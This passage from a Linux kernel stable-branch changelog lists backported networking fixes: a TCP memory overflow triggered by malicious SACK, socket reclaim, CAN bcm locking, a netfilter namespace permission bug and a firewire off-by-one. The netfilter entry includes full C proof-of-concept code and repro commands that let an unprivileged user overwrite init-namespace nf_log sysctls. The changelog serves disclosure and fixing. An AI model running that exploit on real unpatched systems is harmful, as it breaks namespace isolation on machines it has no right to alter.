[ 7858.217351] [<
ffffffff8161e06f>] ipmr_expire_process+0x8f/0x130
[ 7858.217581] [<
ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217785] [<
ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217990] [<
ffffffff810fbc95>] call_timer_fn+0xa5/0x350
[ 7858.218192] [<
ffffffff810fbbf5>] ? call_timer_fn+0x5/0x350
[ 7858.218415] [<
ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.218656] [<
ffffffff810fde10>] run_timer_softirq+0x260/0x640
[ 7858.218865] [<
ffffffff8166379b>] ? __do_softirq+0xbb/0x54f
[ 7858.219068] [<
ffffffff816637c8>] __do_softirq+0xe8/0x54f
[ 7858.219269] [<
ffffffff8107a948>] irq_exit+0xb8/0xc0
[ 7858.219463] [<
ffffffff81663452>] smp_apic_timer_interrupt+0x42/0x50
[ 7858.219678] [<
ffffffff816625bc>] apic_timer_interrupt+0x8c/0xa0
[ 7858.219897] <EOI> [<
ffffffff81055f16>] ? native_safe_halt+0x6/0x10
[ 7858.220165] [<
ffffffff810d64dd>] ? trace_hardirqs_on+0xd/0x10
[ 7858.220373] [<
ffffffff810298e3>] default_idle+0x23/0x190
[ 7858.220574] [<
ffffffff8102a20f>] arch_cpu_idle+0xf/0x20
[ 7858.220790] [<
ffffffff810c9f8c>] default_idle_call+0x4c/0x60
[ 7858.221016] [<
ffffffff810ca33b>] cpu_startup_entry+0x39b/0x4d0
[ 7858.221257] [<
ffffffff8164f995>] rest_init+0x135/0x140
[ 7858.221469] [<
ffffffff81f83014>] start_kernel+0x50e/0x51b
[ 7858.221670] [<
ffffffff81f82120>] ? early_idt_handler_array+0x120/0x120
[ 7858.221894] [<
ffffffff81f8243f>] x86_64_start_reservations+0x2a/0x2c
[ 7858.222113] [<
ffffffff81f8257c>] x86_64_start_kernel+0x13b/0x14a
Fixes:
2942e9005056 ("[RTNETLINK]: Use rtnl_unicast() for rtnetlink unicasts")
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Thu, 15 Sep 2016 15:48:46 +0000 (08:48 -0700)]
net: avoid sk_forward_alloc overflows
commit
20c64d5cd5a2bdcdc8982a06cb05e5e1bd851a3d upstream.
A malicious TCP receiver, sending SACK, can force the sender to split
skbs in write queue and increase its memory usage.
Then, when socket is closed and its write queue purged, we might
overflow sk_forward_alloc (It becomes negative)
sk_mem_reclaim() does nothing in this case, and more than 2GB
are leaked from TCP perspective (tcp_memory_allocated is not changed)
Then warnings trigger from inet_sock_destruct() and
sk_stream_kill_queues() seeing a not zero sk_forward_alloc
All TCP stack can be stuck because TCP is under memory pressure.
A simple fix is to preemptively reclaim from sk_mem_uncharge().
This makes sure a socket wont have more than 2 MB forward allocated,
after burst and idle period.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Fri, 15 May 2015 19:39:25 +0000 (12:39 -0700)]
net: fix sk_mem_reclaim_partial()
commit
1a24e04e4b50939daa3041682b38b82c896ca438 upstream.
sk_mem_reclaim_partial() goal is to ensure each socket has
one SK_MEM_QUANTUM forward allocation. This is needed both for
performance and better handling of memory pressure situations in
follow up patches.
SK_MEM_QUANTUM is currently a page, but might be reduced to 4096 bytes
as some arches have 64KB pages.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Oliver Hartkopp [Mon, 24 Oct 2016 19:11:26 +0000 (21:11 +0200)]
can: bcm: fix warning in bcm_connect/proc_register
commit
deb507f91f1adbf64317ad24ac46c56eeccfb754 upstream.
Andrey Konovalov reported an issue with proc_register in bcm.c.
As suggested by Cong Wang this patch adds a lock_sock() protection and
a check for unsuccessful proc_create_data() in bcm_connect().
Reference: http://marc.info/?l=linux-netdev&m=
147732648731237
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Suggested-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Oliver Hartkopp <socketcan@hartkopp.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jann Horn [Sun, 18 Sep 2016 19:40:55 +0000 (21:40 +0200)]
netfilter: fix namespace handling in nf_log_proc_dostring
commit
dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char child_stack[
1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;
void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}
int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");
/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);
stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}
int main(void) {
outer_uid = getuid();
outer_gid = getgid();
int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");
char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Stefan Richter [Sun, 30 Oct 2016 16:32:01 +0000 (17:32 +0100)]
firewire: net: fix fragmented datagram_size off-by-one
commit
e9300a4b7bbae83af1f7703938c94cf6dc6d308f upstream.
RFC 2734 defines the datagram_size field in fragment encapsulation
headers thus:
datagram_size: The encoded size of the entire IP datagram. The
value of datagram_size [...] SHALL be one less than the value of
Total Length in the datagram's IP header (see STD 5, RFC 791).
Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got
this field with a -/+1 offset:
ether1394_tx() /* transmit */
ether1394_encapsulate_prep()
hdr->ff.dg_size = dg_size - 1;
ether1394_data_handler() /* receive */
if (hdr->common.lf == ETH1394_HDR_LF_FF)
dg_size = hdr->ff.dg_size + 1;
else
dg_size = hdr->sf.dg_size + 1;
Likewise, I observe OS X 10.4 and Windows XP Pro SP3 to transmit 1500
byte sized datagrams in fragments with datagram_size=1499 if link
fragmentation is required.
Only firewire-net sets and gets datagram_size without this offset. The
result is lacking interoperability of firewire-net with OS X, Windows
XP, and presumably Linux' eth1394. (I did not test with the latter.)
For example, FTP data transfers to a Linux firewire-net box with max_rec
smaller than the 1500 bytes MTU
- from OS X fail entirely,
- from Win XP start out with a bunch of fragmented datagrams which
time out, then continue with unfragmented datagrams because Win XP
temporarily reduces the MTU to 576 bytes.
So let's fix firewire-net's datagram_size accessors.
Note that firewire-net thereby loses interoperability with unpatched
firewire-net, but only if link fragmentation is employed. (This happens
with large broadcast datagrams, and with large datagrams on several
FireWire CardBus cards with smaller max_rec than equivalent PCI cards,
and it can be worked around by setting a small enough MTU.)
Signed-off-by: Stefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>